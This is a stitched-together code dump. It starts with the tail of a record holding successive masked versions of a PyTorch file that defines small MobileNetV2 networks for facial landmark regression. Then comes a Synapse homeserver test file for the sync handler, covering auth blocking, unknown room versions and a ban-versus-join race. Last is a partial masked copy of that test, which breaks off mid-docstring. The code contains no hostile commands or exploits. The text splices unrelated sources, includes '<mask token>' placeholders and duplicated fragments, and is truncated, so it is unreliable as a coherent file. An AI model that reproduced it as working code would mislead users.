n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-4": "<mask token>\n\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(nn.Conv2d(inp, oup, 3, stride, 1, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-5": "\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport math\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 3, stride, 1, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n\n if expand_ratio == 1:\n self.conv = nn.Sequential(\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n else:\n self.conv = nn.Sequential(\n # pw\n nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel, output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n # make it nn.Sequential\n self.features = nn.Sequential(*self.features)\n\n # building pts net\n self.pts_net = nn.Sequential(\n nn.Linear(4*self.last_channel, 256),\n nn.PReLU(),\n nn.Linear(256, 256),\n nn.PReLU(),\n nn.Linear(256, num_classes)\n )\n\n\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\n\n\n\nclass SmallMobileNetV2Part(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n if num_classes==68*2:\n part_dim = [22, 22, 18, 40]\n elif num_classes==98*2:\n part_dim = [36, 36, 18, 40]\n elif num_classes==106*2:\n part_dim = [38, 38, 30, 40]\n\n # building first layer\n # assert input_size % 32 == 0\n # Spatial transformer localization-network\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n # Regressor for the 3 * 2 affine matrix\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel, output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n features.append(conv_1x1_bn(input_channel, last_channel))\n # make it nn.Sequential\n return nn.Sequential(*features)\n\n def make_pts_fc(self,num_classes):\n #pdb.set_trace()\n pts_net = nn.Sequential(\n nn.Linear(self.last_channel, 64),\n nn.PReLU(),\n nn.Linear(64, 64),\n nn.PReLU(),\n nn.Linear(64, num_classes)\n )\n return pts_net\n\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n #pdb.set_trace()\n out_1 = self.left_eye_loc(xs_1)\n\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n",
"step-ids": [
7,
11,
13,
15,
17
]
}
|
[
7,
11,
13,
15,
17
] |
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from unittest.mock import AsyncMock, Mock, patch
from twisted.test.proto_helpers import MemoryReactor
from synapse.api.constants import EventTypes, JoinRules
from synapse.api.errors import Codes, ResourceLimitError
from synapse.api.filtering import Filtering
from synapse.api.room_versions import RoomVersions
from synapse.handlers.sync import SyncConfig, SyncResult
from synapse.rest import admin
from synapse.rest.client import knock, login, room
from synapse.server import HomeServer
from synapse.types import UserID, create_requester
from synapse.util import Clock
import tests.unittest
import tests.utils
class SyncTestCase(tests.unittest.HomeserverTestCase):
"""Tests Sync Handler."""
servlets = [
admin.register_servlets,
knock.register_servlets,
login.register_servlets,
room.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.sync_handler = self.hs.get_sync_handler()
self.store = self.hs.get_datastores().main
# AuthBlocking reads from the hs' config on initialization. We need to
# modify its config instead of the hs'
self.auth_blocking = self.hs.get_auth_blocking()
def test_wait_for_sync_for_user_auth_blocking(self) -> None:
user_id1 = "@user1:test"
user_id2 = "@user2:test"
sync_config = generate_sync_config(user_id1)
requester = create_requester(user_id1)
self.reactor.advance(100) # So we get not 0 time
self.auth_blocking._limit_usage_by_mau = True
self.auth_blocking._max_mau_value = 1
# Check that the happy case does not throw errors
self.get_success(self.store.upsert_monthly_active_user(user_id1))
self.get_success(
self.sync_handler.wait_for_sync_for_user(requester, sync_config)
)
# Test that global lock works
self.auth_blocking._hs_disabled = True
e = self.get_failure(
self.sync_handler.wait_for_sync_for_user(requester, sync_config),
ResourceLimitError,
)
self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)
self.auth_blocking._hs_disabled = False
sync_config = generate_sync_config(user_id2)
requester = create_requester(user_id2)
e = self.get_failure(
self.sync_handler.wait_for_sync_for_user(requester, sync_config),
ResourceLimitError,
)
self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)
def test_unknown_room_version(self) -> None:
"""
A room with an unknown room version should not break sync (and should be excluded).
"""
inviter = self.register_user("creator", "pass", admin=True)
inviter_tok = self.login("@creator:test", "pass")
user = self.register_user("user", "pass")
tok = self.login("user", "pass")
# Do an initial sync on a different device.
requester = create_requester(user)
initial_result = self.get_success(
self.sync_handler.wait_for_sync_for_user(
requester, sync_config=generate_sync_config(user, device_id="dev")
)
)
# Create a room as the user.
joined_room = self.helper.create_room_as(user, tok=tok)
# Invite the user to the room as someone else.
invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)
self.helper.invite(invite_room, targ=user, tok=inviter_tok)
knock_room = self.helper.create_room_as(
inviter, room_version=RoomVersions.V7.identifier, tok=inviter_tok
)
self.helper.send_state(
knock_room,
EventTypes.JoinRules,
{"join_rule": JoinRules.KNOCK},
tok=inviter_tok,
)
channel = self.make_request(
"POST",
"/_matrix/client/r0/knock/%s" % (knock_room,),
b"{}",
tok,
)
self.assertEqual(200, channel.code, channel.result)
# The rooms should appear in the sync response.
result = self.get_success(
self.sync_handler.wait_for_sync_for_user(
requester, sync_config=generate_sync_config(user)
)
)
self.assertIn(joined_room, [r.room_id for r in result.joined])
self.assertIn(invite_room, [r.room_id for r in result.invited])
self.assertIn(knock_room, [r.room_id for r in result.knocked])
# Test a incremental sync (by providing a since_token).
result = self.get_success(
self.sync_handler.wait_for_sync_for_user(
requester,
sync_config=generate_sync_config(user, device_id="dev"),
since_token=initial_result.next_batch,
)
)
self.assertIn(joined_room, [r.room_id for r in result.joined])
self.assertIn(invite_room, [r.room_id for r in result.invited])
self.assertIn(knock_room, [r.room_id for r in result.knocked])
# Poke the database and update the room version to an unknown one.
for room_id in (joined_room, invite_room, knock_room):
self.get_success(
self.hs.get_datastores().main.db_pool.simple_update(
"rooms",
keyvalues={"room_id": room_id},
updatevalues={"room_version": "unknown-room-version"},
desc="updated-room-version",
)
)
# Blow away caches (supported room versions can only change due to a restart).
self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()
self.store.get_rooms_for_user.invalidate_all()
self.store._get_event_cache.clear()
self.store._event_ref.clear()
# The rooms should be excluded from the sync response.
# Get a new request key.
result = self.get_success(
self.sync_handler.wait_for_sync_for_user(
requester, sync_config=generate_sync_config(user)
)
)
self.assertNotIn(joined_room, [r.room_id for r in result.joined])
self.assertNotIn(invite_room, [r.room_id for r in result.invited])
self.assertNotIn(knock_room, [r.room_id for r in result.knocked])
# The rooms should also not be in an incremental sync.
result = self.get_success(
self.sync_handler.wait_for_sync_for_user(
requester,
sync_config=generate_sync_config(user, device_id="dev"),
since_token=initial_result.next_batch,
)
)
self.assertNotIn(joined_room, [r.room_id for r in result.joined])
self.assertNotIn(invite_room, [r.room_id for r in result.invited])
self.assertNotIn(knock_room, [r.room_id for r in result.knocked])
def test_ban_wins_race_with_join(self) -> None:
"""Rooms shouldn't appear under "joined" if a join loses a race to a ban.
A complicated edge case. Imagine the following scenario:
* you attempt to join a room
* racing with that is a ban which comes in over federation, which ends up with
an earlier stream_ordering than the join.
* you get a sync response with a sync token which is _after_ the ban, but before
the join
* now your join lands; it is a valid event because its `prev_event`s predate the
ban, but will not make it into current_state_events (because bans win over
joins in state res, essentially).
* When we do a sync from the incremental sync, the only event in the timeline
is your join ... and yet you aren't joined.
The ban coming in over federation isn't crucial for this behaviour; the key
requirements are:
1. the homeserver generates a join event with prev_events that precede the ban
(so that it passes the "are you banned" test)
2. the join event has a stream_ordering after that of the ban.
We use monkeypatching to artificially trigger condition (1).
"""
# A local user Alice creates a room.
owner = self.register_user("alice", "password")
owner_tok = self.login(owner, "password")
room_id = self.helper.create_room_as(owner, is_public=True, tok=owner_tok)
# Do a sync as Alice to get the latest event in the room.
alice_sync_result: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
create_requester(owner), generate_sync_config(owner)
)
)
self.assertEqual(len(alice_sync_result.joined), 1)
self.assertEqual(alice_sync_result.joined[0].room_id, room_id)
last_room_creation_event_id = (
alice_sync_result.joined[0].timeline.events[-1].event_id
)
# Eve, a ne'er-do-well, registers.
eve = self.register_user("eve", "password")
eve_token = self.login(eve, "password")
# Alice preemptively bans Eve.
self.helper.ban(room_id, owner, eve, tok=owner_tok)
# Eve syncs.
eve_requester = create_requester(eve)
eve_sync_config = generate_sync_config(eve)
eve_sync_after_ban: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(eve_requester, eve_sync_config)
)
# Sanity check this sync result. We shouldn't be joined to the room.
self.assertEqual(eve_sync_after_ban.joined, [])
# Eve tries to join the room. We monkey patch the internal logic which selects
# the prev_events used when creating the join event, such that the ban does not
# precede the join.
mocked_get_prev_events = patch.object(
self.hs.get_datastores().main,
"get_prev_events_for_room",
new_callable=AsyncMock,
return_value=[last_room_creation_event_id],
)
with mocked_get_prev_events:
self.helper.join(room_id, eve, tok=eve_token)
# Eve makes a second, incremental sync.
eve_incremental_sync_after_join: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
eve_requester,
eve_sync_config,
since_token=eve_sync_after_ban.next_batch,
)
)
# Eve should not see herself as joined to the room.
self.assertEqual(eve_incremental_sync_after_join.joined, [])
# If we did a third initial sync, we should _still_ see eve is not joined to the room.
eve_initial_sync_after_join: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
eve_requester,
eve_sync_config,
since_token=None,
)
)
self.assertEqual(eve_initial_sync_after_join.joined, [])
_request_key = 0
def generate_sync_config(
user_id: str, device_id: Optional[str] = "device_id"
) -> SyncConfig:
"""Generate a sync config (with a unique request key)."""
global _request_key
_request_key += 1
return SyncConfig(
user=UserID.from_string(user_id),
filter_collection=Filtering(Mock()).DEFAULT_FILTER_COLLECTION,
is_guest=False,
request_key=("request_key", _request_key),
device_id=device_id,
)
|
normal
|
{
"blob_id": "fc5b9117ecf56401a888e2b6a5e244f9ab115e41",
"index": 3999,
"step-1": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n <mask token>\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * 